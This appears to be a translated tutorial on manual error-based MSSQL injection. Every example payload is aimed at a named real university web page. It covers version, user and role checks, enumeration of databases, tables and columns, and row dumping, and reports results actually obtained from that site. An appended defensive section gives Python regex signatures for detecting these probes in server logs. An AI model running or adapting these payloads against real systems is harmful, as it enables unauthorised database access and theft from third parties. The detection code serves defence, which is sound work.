Detailed manual database enumeration process and statement parsing

Source: Internet
Author: User

MSSQL injection in error mode

2.1 Basic information

2.1.1 Determine whether injection exists

http://yjsc.ahau.edu.cn/web/InfoKindList.aspx?kind=0103'

From the error echoed by the single quotation mark, the parameter is found to be a string (quoted) type. Further judgment is made with and '1'='1' and '2'='2. It is conceivable that the SQL statement is: select * from table where string = '000000', a complete SQL statement, so the following can be constructed: select * from table where string = '000000' and '1'='1' and '2'='2'. The statement we added is and '1'='1' and '2'='2, which closes the single quotation marks on both sides of the original '123. Where '1'='1' appears, 1=1 can be used instead and the query still returns normally, but a=a returns an error (an unquoted a is parsed as a column name), while 'A'='A' returns a correct result. Numbers on both sides of the equal sign are a special case. The required SQL injection statement is then constructed in the position of and '1'='1.

2.1.2 Determine whether it is MSSQL

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and (select count(*) from sysobjects)>1 and '1'!>'3

Every MSSQL database has the table sysobjects. Therefore, if it is an MSSQL database, the result returned by the query must be greater than 1, that is, (select count(*) from sysobjects)>1. The logic is correct and the page returns normally.

2.1.3 MSSQL version

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and 1=(select @@version) and '1'!>'3

Here '1'!>'3 is a permanently true condition: the string '1' is not greater than (and not equal to) the string '3'. Any other true condition can be constructed instead, for example '1'='1, '2'='2, or 'A'='a.

2.1.4 Current user

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and 1=(select user) and '1'!>'3

2.1.5 Current database

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and 1=(select db_name()) and '1'!>'3

Here the current database is Gwork_ahnd.

2.1.6 All databases

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and 1=(select name from master.dbo.sysdatabases where dbid=1) and '1'!>'3

By changing the value of dbid (1, 2, 3, and so on), every database name can be retrieved.

2.1.7 Determine user permissions

Server role:

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and 1=(select IS_SRVROLEMEMBER('sysadmin')) and '1'!>'3

Server roles include sysadmin, serveradmin, setupadmin, securityadmin, diskadmin, and bulkadmin.

Database role:

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and 1=(select is_member('db_owner')) and '1'!>'3

Database roles include public, db_owner, and so on. To determine whether the server role is sa: select IS_SRVROLEMEMBER('sysadmin') returns 1. An sa-level user also has the public and db_owner permissions, but a user with public and db_owner is not necessarily the highest sa permission. The user permission here is db_owner.

2.2 Enumerating table names

2.2.1 Determine the number of tables

http://yjsc.ahau.edu.cn/web/InfoKindList.aspx?kind=0103' and (select cast(count(*) as varchar(100))%2bchar(94) from sysobjects where xtype='U')=1 and '1'!>'3

Pay attention to several points. One is the use of the cast function: after the user table count is taken out, it is converted to varchar and concatenated with the "^" character. "%2b" is the URL encoding of the character "+", and "+" is the string concatenation operator in MSSQL. Here %2b must be used in place of a literal "+" (which the URL decoder would turn into a space); otherwise an error is returned. char(94) = ^.

2.2.2 Retrieve the first table name

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and (select top 1 name from sysobjects where xtype='U')>1 and '1'!>'3

2.2.3 Retrieve the next table name

Method 1: use not in

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('py_WKJSJDJKS'))>1 and '1'!>'3

Method 2: use select top

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and convert(int,(select top 1 name from sysobjects where xtype='U' and name not in (select top 1 name from sysobjects where xtype='U'))>1 and '1'!>'3

2.3 Enumerating column names

2.3.1 Retrieve the first column name, with having 1=1

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and (select * from PY_WKJSJDJKS having 1=1)>1 and '1'!>'3

2.3.2 Use group by

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and (select * from PY_WKJSJDJKS group by xh)>1 and '1'!>'3

2.4 Dumping data

2.4.1 Read the first row (the data in the name column of the Web_InfoKinds table)

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and (select top 1 name from Web_InfoKinds)>1 and '1'!>'3

2.4.2 Read the second row

Method 1: not in

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and convert(int,(select top 1 name from Web_InfoKinds where name not in ('department introduction'))>1 and '1'!>'3

This method is syntactically correct, but here it fails with an error and cannot be run.

Method 2: select top

yjsc.ahau.edu.cn/web/InfoKindList.aspx?Kind=0103' and convert(int,(select top 1 name from Web_InfoKinds where name not in (select top 1 name from Web_InfoKinds))>1 and '1'!>'3

Method 2 above is more efficient than method 1.
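As an added, defender-side example that is not part of the original article, the following Python scans constructed IIS-style log lines for the fingerprints of the probes walked through above (system tables, role and version checks, the cast/convert error-based leak, the top 1 / not in row walking, and the '1'!>'3 tail). It decodes the query string the way the server does, so "+" becomes a space and "%2b" becomes "+", which is exactly the nuance noted in 2.2.1. The log format, IP addresses and signature labels are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Technique labels from the walkthrough, each paired with a regex for its T-SQL
# fingerprint in a decoded, lower-cased, whitespace-collapsed query string.
SIGNATURES = [
    ("system-table enumeration", re.compile(r"\b(sysobjects|sysdatabases|syscolumns)\b")),
    ("version/user/database probe", re.compile(r"@@version|\bselect\s+user\b|\bdb_name\s*\(")),
    ("role probe", re.compile(r"\b(is_srvrolemember|is_member)\s*\(")),
    ("error-based leak via type conversion", re.compile(r"\bconvert\s*\(\s*int|\bcast\s*\(.+?\bas\s+varchar")),
    ("subquery compared to a number", re.compile(r"\)\s*>\s*\d+")),
    ("column leak via having/group by", re.compile(r"\bhaving\s+1\s*=\s*1\b|\bgroup\s+by\b")),
    ("row walking with top 1 / not in", re.compile(r"\btop\s+1\b.*\bnot\s+in\b")),
    ("always-true tail condition", re.compile(r"'\d'\s*!>\s*'\d")),
]

# Constructed W3C-style log excerpt (IIS records the query string URL-encoded).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:00 203.0.113.5 GET /web/InfoKindList.aspx kind=0103 200
2024-01-01 10:00:01 203.0.113.5 GET /web/InfoKindList.aspx kind=0103'+and+(select+count(*)+from+sysobjects)>1+and+'1'!>'3 200
2024-01-01 10:00:02 203.0.113.5 GET /web/InfoKindList.aspx kind=0103'+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))+and+'1'!>'3 500
2024-01-01 10:00:03 203.0.113.5 GET /web/InfoKindList.aspx kind=0103'+and+(select+cast(count(*)+as+varchar(100))%2bchar(94)+from+sysobjects+where+xtype='U')=1+and+'1'!>'3 500
2024-01-01 10:00:04 198.51.100.7 GET /web/InfoKindList.aspx kind=0104 200""".splitlines()

def normalise(uri: str) -> str:
    """Decode the query as the server sees it (+ is a space, %2b is +) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(urlsplit(uri).query)).lower()

def classify(uri: str) -> list[str]:
    """Return the labels of every signature that matches the request's decoded query."""
    q = normalise(uri)
    return [label for label, rx in SIGNATURES if rx.search(q)]

def scan_log(lines):
    """Return (client_ip, uri, techniques) for each request matching at least one signature."""
    hits = []
    for line in lines:
        parts = line.split()
        if not parts or parts[0].startswith("#") or len(parts) < 7:
            continue
        ip, stem, query = parts[2], parts[4], parts[5]
        uri = stem if query == "-" else f"{stem}?{query}"
        techniques = classify(uri)
        if techniques:
            hits.append((ip, uri, techniques))
    return hits

if __name__ == "__main__":
    for ip, uri, techniques in scan_log(SAMPLE_LOG):
        print(ip, uri, techniques)
```

A burst of such hits from one client, especially paired with HTTP 500 responses, is the signal to look for; the underlying fix is a parameterised query plus suppressed detailed error pages, since this technique relies entirely on the conversion error text reaching the client.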
